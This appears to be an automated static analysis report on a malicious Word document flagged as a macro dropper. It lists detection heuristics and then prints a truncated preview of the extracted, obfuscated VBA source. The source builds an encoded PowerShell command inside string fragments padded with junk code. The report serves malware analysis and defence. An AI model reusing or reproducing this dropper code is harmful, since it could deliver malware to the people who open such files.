Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0897bfaf97645394…

MALICIOUS

Office (OLE)

Size: 111.5 KB
Created: 2018-06-20 23:14:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: 16b168cfd7f2eefeb02c3e3aa04083e8
SHA-1: 522988ade052d51b5dfde5d376effb4a3e693194
SHA-256: 0897bfaf976453945d5a85cd06dce30ed4056a7ed11e84eba631f3d1076d1022
Risk score: 242

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6585023-0 (severity: critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6585023-0
  • VBA macros detected (severity: medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (severity: high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (severity: high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace identifier that Office itself writes into document markup, so its presence is expected in benign documents as well.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11281 bytes
SHA-256: ab082eaf50b2a2b91a0bf6111010f0995aa549ef472dfd0563ac964f01e8eb68

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "OscBYbbNcFiGzm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IsBZjroFVSaMih"
Function UcFGaqbSz()
On Error Resume Next
EzdKQi = 88270
JsGzd = CDate(60416)
pJiUX = UFlOEJ
zGHof = CDate(IjBlh + Sin(9415 + 5793) * 87619 * CInt(4082))
ABKnhc = CByte(tCMic)
TZLwGq = 60933
lsLXL = "Owe" + "rSHell ('2" + "3H97H112E80H97>" + "94P120~19R14H1" + "9H93>86y"
VUufb = 59564
RGwCz = CDate(73449)
BNmJiz = QHsSp
umKIf = CDate(CIAAo + Sin(5907 + 51964) * 23041 * CInt(77602))
ZZdHTR = CByte(wLrSlB)
VHWTWr = 33435
smhFr = "68~30R92!81H" + "89H86c80H71E1" + "9c65E82E" + "93~87~92R94c"
azjLjK = 50450
AmAMsf = CDate(60888)
jYfkC = jbZzC
XAhAHC = CDate(oVooi + Sin(73920 + 48287) * 35610 * CInt(51871))
diardj = CByte(pKcZvM)
Tzownq = 21412
tWsRh = "8>23x105R92x123" + "E118~67y19y14" + "y19E93P86>6" + "8c30R92P81E89P"
MuwHFN = 53243
zZhDWr = CDate(89993)
XapZLa = bNDrqt
IWCOsQ = CDate(KdOOvQ + Sin(55795 + 94560) * 33447 * CInt(46091))
GiHbTZ = CByte(IGAJV)
cZuQV = 13691
YmisjRD = "86H80R71!19P96" + ">74>64R71" + "E86c94x29" + "~125" + "c86>" + "71x29x100" + ">86R81>112H" + "95!90H86R93y71" + "P8!23E90E9"
QKrMpm = 8474
DfTnU = CDate(70194)
LFKruQ = doLGli
ViqMKG = CDate(Irwaf + Sin(29162 + 88598) * 87078 * CInt(52712))
UcQfoU = CByte(AiLcY)
Rzclu = 50571
FLhmwHsd = "8y89c101" + "!113>19y14P" + "19y2" + "0R91>71H" + "71~67P9R28" + "~28x87" + "R82>93x" + "80P" + "92x87P29c"
UcFGaqbSz = lsLXL + smhFr + tWsRh + YmisjRD + FLhmwHsd
End Function
Function pXAimiOG()
On Error Resume Next
ibbloG = 28692
WvHWNG = CDate(19225)
lOAkAk = rVzmwo
XhDpW = CDate(XDjkiK + Sin(62459 + 59330) * 78815 * CInt(92875))
JWJEsb = CByte(arbNu)
iGLJl = 71979
vwtwYaKU = "80~" + "92P94c28P6" + "8R67" + "~30P80>92~" + "93!71" + "R86"
jBzwF = 41748
tkFrp = CDate(99056)
TmSqOr = RVrHRT
EtApSO = CDate(INptsH + Sin(36862 + 11824) * 63239 * CInt(75153))
CrGLpc = CByte(JkXzbz)
ksWLq = 68029
jSwhWHZlZEN = "~93>71R28y65x11" + "7P103c96R73" + "y28H115H91" + "P71!71" + "P67>9E" + "28y28H" + "80c"
aMKZkM = 60577
BsmBw = CDate(41202)
wcjWl = TwLUUc
IFVHbR = CDate(GXRTfo + Sin(94339 + 52285) * 77302 * CInt(8087))
qhnDSr = CByte(NQNiJ)
NOAXi = 6263
DrJSLLXp = "92" + "y80x92" + "E91H92" + "H70!29!80~"
Bfspjc = 18703
FIlvSs = CDate(36770)
CdTwnP = rzvFiu
XqcYbz = CDate(QjmpU + Sin(52187 + 96587) * 89633 * CInt(30658))
NaEiz = CByte(tMmUln)
AOPpwu = 97971
noYjiIB = "92!94c29>82x70c" + "28y82P70y9" + "2y84>123!97" + "y28" + "!115y" + "91E71P71c67~9" + "P28~28E82y90P" + "85R86x64~" + "87R8" + "6!64R"
WJUdIi = 40076
hiCIm = CDate(72523)
rItRmj = FIbcq
noiIL = CDate(khdoDh + Sin(63570 + 58749) * 47379 * CInt(87535))
DHNVB = CByte(Pzikb)
zivFi = 92289
QnArwSd = "67P86P71H64" + "H29H85E65~28E69" + "y7>1" + "21>5P28!1"
VJsFs = 63403
DCMHq = CDate(61928)
EUFhF = bpGVzv
uNDWu = CDate(ooaci + Sin(643 + 42022) * 74831 * CInt(3607))
uWIkP = CByte(dsnBI)
CiRimK = 51958
qzaUjACPX = "15" + ">91E71H71P" + "67H9E28c" + "28!80R91~65"
nimwzO = 12907
OPYYso = CDate(9039)
RtLNWI = fSEck
qudFL = CDate(DGtGd + Sin(54586 + 23322) * 69891 * CInt(10194))
FBmiB = CByte(InkwMO)
qANMbb = 5956
pSjTBEr = "E9" + "0c64R71H90H9" + "3c86P9" + "5!86R" + "81y86c80" + "y88>2" + "9H80x92c"
VlPkUs = 15775
wnHvTR = CDate(12309)
wZwjjJ = BjTKo
qdOVw = CDate(pEuJq + Sin(34025 + 29439) * 92392 * CInt(61945))
jmZdKp = CByte(wdqvi)
cpQEj = 81674
RGmDIaMtuhd = "94~28x11>5c98x" + "10!28!1" + "15E91>71y" + "71>67~" + "9~28P2" + "8P68>68c68y" + "29P67c82c74!67" + "E95c" + "70P64!29!69x93H" + "28~82~6"
AQZIJi = 67003
ofPAV = CDate(49671)
IhHYsw = fLlzT
bhvDY = CDate(qNiOp + Sin(52024 + 49807) * 92434 * CInt(31353))
FQXCHb = CByte(tSaohW)
IMPRu = 66204
OEzhGljFXw = "4H103E112!127" + "c5~71!2" + "8c20~29" + "!96c67y95R90E" + "71y27y20!115" + ">20~26" + "P8y"
pXAimiOG = vwtwYaKU + jSwhWHZlZEN + DrJSLLX
... (truncated)